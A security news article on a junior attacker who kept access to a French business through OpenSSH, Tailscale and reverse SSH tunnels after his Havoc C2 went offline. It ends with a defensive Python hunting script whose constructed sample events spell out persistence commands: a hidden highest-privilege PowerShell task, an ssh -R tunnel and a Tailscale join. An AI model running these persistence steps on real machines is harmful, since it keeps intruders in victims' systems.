Junior Hacker Used Tailscale and OpenSSH to Keep Access After His C2 Went Offline

Swati Khandelwal | Jun 17, 2026 | Malware / Cyber Attack

A French-speaking attacker broke into a small French automotive business, planted a keylogger, and stole banking and email credentials. Ordinary stuff, until one move near the end. Before his command-and-control server went dark, he installed OpenSSH and Tailscale on a victim's machine, building a way back in that did not run through the C2 at all.
When the Havoc server went offline the next day, his access did not. Eighteen days later, the C2 came back, his agents reconnected on their own, and he carried on.

Cato Networks captured the whole operation command by command, 339 commands over 33 days, after the operator left his SSH keys and a step-by-step playbook in an open storage bucket. The write-up, published Tuesday by Cato CTRL researcher Vitaly Simonovich, is a rare view of an intrusion from the operator's keyboard rather than from the forensic leftovers. The researchers' lesson is blunt: pulling a C2 server offline is not remediation if the attacker has already built a separate door.

The actor, handle "Poisson," is not an APT. Researchers describe a junior operator on what looks like a school schedule, active after 3 p.m. CET with a long midday gap, all of it running on free-tier kit: DuckDNS, Backblaze B2, and a cheap IONOS VPS in Berlin. His tradecraft was thin. He leaked his home directory five times, named his storage buckets after his own handle, and left a test file of his own keystrokes, typed over and over, inside the keylogger package. He failed at roughly half of what he tried. He compromised four machines anyway.

The chain

The malware ran almost entirely in memory. A VBScript stager with a sandbox-evasion delay decrypted a PowerShell loader, which pulled down a .NET loader that ran Havoc's Demon agent without ever writing the implant to disk. For elevation, he used Start-Process -Verb RunAs, which is not a silent UAC bypass: it pops the Windows consent prompt and waits for someone to click Yes. On one victim, it took a dozen tries across two days. After that came the nailing-down: a scheduled task running at every logon with highest privileges, shellcode injected into Explorer.exe, and a custom-built RustDesk as a backup channel. The credential grabber was a 70-line Python keylogger that wrote keystrokes to a local file, with no beacon and no exfil server.
Poisson just logged in, grabbed the file by hand, and ran powercfg to keep the machines from sleeping, so harvesting never paused.

The move that matters

On April 7, in a five-hour overnight session, he installed OpenSSH Server and Tailscale, joined the victim's machine to his private Tailscale network, and set up key-based SSH and a reverse tunnel. Now he could reach the machine over Tailscale's encrypted mesh with no C2 and no exposed ports. The next day, the Havoc infrastructure went offline. Cato does not say why, and it barely matters: the Tailscale path sat on a separate network, so the access lived. When the C2 returned on April 26, the agents reconnected automatically, no re-compromise required.

Over the final five days, he ran 145 more commands, probed smart-card and certificate stores (a sign he was eyeing certificate-based logins), ran two unexplained executables from a file named Thales.zip for about 32 minutes in total, then deleted 17 files and went quiet on May 1.

What he wanted was narrow. No Mimikatz, no lateral movement, no ransomware, and no sign he took the documents he browsed, from tax records to insurance. Just what people type: banking logins, email passwords, government portals. For a small business owner, that is direct financial exposure.

None of the tools is new, which is the point. China's APT31 used Tailscale through 2024 and 2025 to tunnel quietly out of Russian IT firms, Scattered Spider has leaned on legitimate remote-access tools like Ngrok and FleetDeck, and RustDesk, Poisson's backup channel, turns up in recent Akira ransomware intrusions. The binaries are signed and legitimate, so detection that stops at bad files rather than bad behavior misses them. What Poisson adds is command-level proof that the trick outlives a takedown, run by someone clearly still learning.

What to watch

Cato's hunting list is concrete:

- Alert when OpenSSH Server is installed on a Windows workstation, which is rarely legitimate.
- Watch for tailscale.exe on machines that have no reason to run a VPN.
- Look for ssh -R reverse tunnels heading to outside hosts.
- Check for wscript.exe running .vbs files out of user staging folders.
- Flag scheduled tasks set to run with highest privileges that launch script interpreters.
- Watch for powercfg standby-timeout changes that keep machines awake.
- Block DuckDNS.

The bigger one: when you find a C2, assume it is not the only way in, and go hunting for the quiet persistence layer behind it.

What was in Thales.zip, and what those two programs did in their 32 minutes on the machine, is the question Cato leaves open. The answer that matters more: the C2 was never the intrusion, just one way into it. Kill it and leave OpenSSH, Tailscale, the scheduled task, and the keylogger running, and the attacker still has a way back in. That is the part remediation keeps missing.

Tags: Command and Control, Cyber Attack, Havoc, keylogger, Malware, OpenSSH, Tailscale
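The hunting list above, turned into rules that run over Windows process-creation and DNS-query telemetry. This is an added example, not code from Cato CTRL or from the article; the event fields (host, role, image, command line) are Sysmon-style, but the sample events, the host names, the 10/8-172.16/12-192.168/16 internal ranges, the .corp.example suffix and the example-c2.duckdns.org name are all constructed here and are not indicators from the report. One deliberate design choice: Tailscale's 100.64.0.0/10 address space is left out of the internal ranges, so an ssh -R tunnel whose far end is a tailnet peer counts as heading to an outside host, which is exactly the path the article describes.

```python
"""Hunt rules for the post-C2 persistence layer described above, run over
constructed Windows process-creation and DNS-query events (Sysmon-style fields)."""
import ipaddress
import re
from collections import namedtuple
from typing import Iterable, List, Optional, Tuple

# Assumed organisation ranges and DNS suffix (hypothetical). Tailscale's CGNAT range
# 100.64.0.0/10 is deliberately absent, so a tunnel to a tailnet peer is "outside".
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
INTERNAL_SUFFIX = ".corp.example"
# ssh options that consume the next token, so the destination host can be located
SSH_OPTS_WITH_ARG = {"-R", "-L", "-D", "-i", "-p", "-o", "-F", "-J", "-l", "-b",
                     "-c", "-e", "-m", "-w", "-W", "-Q", "-I", "-E", "-B", "-S"}
INTERPRETERS = re.compile(r"\b(powershell|pwsh|wscript|cscript|mshta|cmd)(\.exe)?\b", re.I)
STAGING_DIRS = re.compile(r"\\(AppData|Temp|Downloads|Public|ProgramData)\\", re.I)
KEEP_AWAKE = re.compile(r"[/-](?:change|x)\s+(?:standby|hibernate)-timeout-(?:ac|dc)\s+0\b", re.I)

ProcEvent = namedtuple("ProcEvent", "host role image cmdline")  # role comes from asset inventory
Alert = namedtuple("Alert", "rule host detail")

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def ssh_target(cmdline: str) -> Optional[str]:
    """Destination host of an ssh command line: the first non-option token,
    skipping the values of options such as -R, -i and -p."""
    toks, i = cmdline.split(), 1
    while i < len(toks):
        if toks[i].startswith("-"):
            i += 2 if toks[i] in SSH_OPTS_WITH_ARG else 1   # "-R2222:..." is a single token
            continue
        return toks[i].rsplit("@", 1)[-1]
    return None

def is_internal(host: str) -> bool:
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host.lower() == "localhost" or host.lower().endswith(INTERNAL_SUFFIX)
    return any(ip in net for net in INTERNAL_NETS)

def hunt_processes(events: Iterable[ProcEvent]) -> List[Alert]:
    out = []
    for ev in events:
        exe, cl, low = basename(ev.image), ev.cmdline, ev.cmdline.lower()
        installs = "openssh.server" in low and ("add-windowscapability" in low or "/add-capability" in low)
        if ev.role == "workstation" and (exe == "sshd.exe" or installs):
            out.append(Alert("openssh_server_on_workstation", ev.host, cl))
        if ev.role == "workstation" and exe in ("tailscale.exe", "tailscaled.exe"):
            out.append(Alert("tailscale_on_workstation", ev.host, cl))
        if exe == "ssh.exe" and re.search(r"(^|\s)-R\S*", cl):        # remote forward requested
            target = ssh_target(cl)
            if target and not is_internal(target):
                out.append(Alert("ssh_reverse_tunnel_outbound", ev.host, f"{target} <- {cl}"))
        if exe in ("wscript.exe", "cscript.exe") and ".vbs" in low and STAGING_DIRS.search(cl):
            out.append(Alert("vbs_from_user_staging_dir", ev.host, cl))
        if exe == "schtasks.exe" and "/create" in low and re.search(r"/rl\s+highest", low):
            tr = re.search(r'/tr\s+("[^"]*"|\S+)', cl, re.I)            # the task's action
            if tr and INTERPRETERS.search(tr.group(1)):
                out.append(Alert("highest_priv_task_runs_interpreter", ev.host, cl))
        if exe == "powercfg.exe" and KEEP_AWAKE.search(cl):
            out.append(Alert("powercfg_keeps_host_awake", ev.host, cl))
    return out

def hunt_dns(queries: Iterable[Tuple[str, str]]) -> List[Alert]:
    return [Alert("duckdns_lookup", host, q) for host, q in queries
            if q.lower().rstrip(".").endswith(".duckdns.org")]

def hunt(procs: Iterable[ProcEvent], dns: Iterable[Tuple[str, str]]) -> List[Alert]:
    return hunt_processes(procs) + hunt_dns(dns)

# Constructed telemetry, not from the Cato report: ws01 replays the sequence the
# article describes; srv-jump and ws02 are benign look-alikes that must stay quiet.
WS = "workstation"
PROCS = [
    ProcEvent("ws01", WS, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoProfile -Command Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0"),
    ProcEvent("ws01", WS, r"C:\Windows\System32\OpenSSH\sshd.exe", "sshd.exe"),
    ProcEvent("ws01", WS, r"C:\Program Files\Tailscale\tailscale.exe", "tailscale.exe up --authkey tskey-auth-PLACEHOLDER"),
    ProcEvent("ws01", WS, r"C:\Windows\System32\OpenSSH\ssh.exe",
              r"ssh.exe -i C:\Users\Public\id_ed25519 -N -R 2222:127.0.0.1:22 ops@100.101.102.103"),
    ProcEvent("srv-jump", "server", r"C:\Windows\System32\OpenSSH\ssh.exe", "ssh.exe -R 8080:localhost:80 admin@10.0.5.20"),
    ProcEvent("ws01", WS, r"C:\Windows\System32\wscript.exe", r"wscript.exe //B C:\Users\marie\AppData\Local\Temp\invoice.vbs"),
    ProcEvent("ws01", WS, r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /tn "OneDriveUpdate" /sc onlogon /rl highest /tr "powershell.exe -w hidden -ep bypass -f C:\Users\marie\AppData\Roaming\svc.ps1"'),
    ProcEvent("ws02", WS, r"C:\Windows\System32\schtasks.exe", r"schtasks.exe /create /tn Backup /sc daily /rl highest /tr C:\Tools\backup.exe"),
    ProcEvent("ws01", WS, r"C:\Windows\System32\powercfg.exe", "powercfg.exe /change standby-timeout-ac 0"),
    ProcEvent("ws02", WS, r"C:\Windows\System32\powercfg.exe", "powercfg.exe /change monitor-timeout-ac 15"),
]
DNS = [("ws01", "example-c2.duckdns.org"), ("ws02", "update.microsoft.com")]

if __name__ == "__main__":
    for a in hunt(PROCS, DNS):
        print(f"{a.rule:36} {a.host:9} {a.detail}")
```

The role field is what keeps the OpenSSH and Tailscale rules from paging on jump hosts and build servers where both tools may be sanctioned; feed it from your asset inventory rather than guessing from the hostname. The reverse-tunnel rule is the one worth tuning most: ssh -R to a genuinely internal bastion is normal admin traffic, ssh -R to anything else, tailnet addresses included, is the pattern this intrusion ran on.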
Source: https://thehackernews.com/2026/06/junior-hacker-used-tailscale-and.html (published 2026-06-17T16:00:56+00:00)

Categories: Malware, Supply Chain, Incident Response, Threat Intelligence

Entities: Poisson (threat actor); Tailscale, OpenSSH, Havoc, RustDesk (products); Cato Networks (vendor)

Indicators noted: Havoc (command-and-control framework used by the attacker); Demon (agent used by the Havoc framework); RustDesk (backup remote access channel used by the attacker)